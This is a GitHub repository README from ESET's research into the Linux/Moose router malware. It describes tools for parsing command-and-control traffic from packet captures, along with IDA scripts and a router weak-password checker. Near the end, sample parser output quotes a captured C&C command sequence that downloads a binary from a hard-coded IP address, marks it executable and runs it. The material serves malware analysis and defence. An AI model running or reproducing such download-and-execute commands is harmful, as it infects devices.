Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
data
ida
lib
router-check
targeted-vendors
wireshark-profile/disable-dissectors
README.adoc
cnc1-fake-server.py
extract_sample.sh
parse_cnc1_10073reports.py
parse_cnc1_config.py
parse_cnc1_wordlist.py
parse_cnc2_nattraversal.py
parse_cnc3_response.py
parse_cnc_request.py
parse_cnc_request_bulk.py
parse_cnc_request_bulk.sh
pcap-extract-10073-socks4.sh
pcap-extract-10073-socks5.sh
pcap-extract-traffic.sh
tshark_to_raw.py

README.adoc

Linux/Moose

Copyright © 2015 ESET

Content of this repository

cnc1-fake-server.py

Run a fake configuration server that serves a static file

data/

Example captured data

extract_sample.sh

Extract telnet data. Useful to extract sample of echo infection method

ida/

IDA Python scripts

lib/

Shared code

parse_cnc1_10073reports.py

Extract messages described in the section Reporting a Peer Found to the Configuration C&C Server

parse_cnc1_config.py

Extracts C&C configuration messages

parse_cnc1_wordlist.py

Extracts usernames and passwords provided by in the C&C configuration

parse_cnc2_nattraversal.py

Extract relay C&C tunnel data

parse_cnc3_response.py

Extract report C&C responses

parse_cnc_request_bulk.py

Bulk extract config C&C requests (output to terminal)

parse_cnc_request_bulk.sh

Bulk extract config C&C requests (output to files)

parse_cnc_request.py

Extract information sent to C&C by infected bot

pcap-extract-10073-socks4.sh

Extract proxy service socks4 tunnel info

pcap-extract-10073-socks5.sh

Extract proxy service socks5 tunnel info

pcap-extract-traffic.sh

Wraps around tshark to gather interesting traffic patterns from pcaps

targeted-vendors/

List of device vendors that could be affected by Linux/Moose with instructions to test your own hardware.

router-check/

Source code for the tool that tests if your own router is reachable via Telnet and uses a weak or default username and password.

tshark_to_raw.py

Processes output of pcap-extract-traffic.sh and dumps raw binary contained in the traffic into files for further processing

wireshark-profile/

A wireshark profile that prevents the HTTP dissector from kicking in

Conventions

  • Configuration C&C Server is cnc1

  • Relay C&C Server is cnc2

  • Report C&C Server is cnc3

Extracting information from Pcap captures

Scripts exist to extract relevant information from pcaps.

pcap-extract-traffic.sh

Runs the proper tshark line. Output raw hex content to stdout.

tshark_to_raw.py

Re-assembles the TCP traffic and write it to disk.

parse_cnc_config.py

Given a raw tcp stream can extract C&C config

Example usage:

./pcap-extract-traffic.sh cnc1-response <file.pcap> | ./tshark_to_raw.py
./parse_cnc_config.py tcpstream-000022859.raw

Parsing configuration files

$ ./parse_cnc3_response.py data/cnc3-response-got-shell.raw
{'cmd_0': u'cd /var\r\n',
'cmd_1': u'rm ./elan2\r\n',
'cmd_2': u'wget http://85.159.237.107/xx/atheros_mips/elan2\r\n',
'cmd_3': u'chmod +x ./elan2\r\n',
'cmd_4': u'./elan2\r\n'}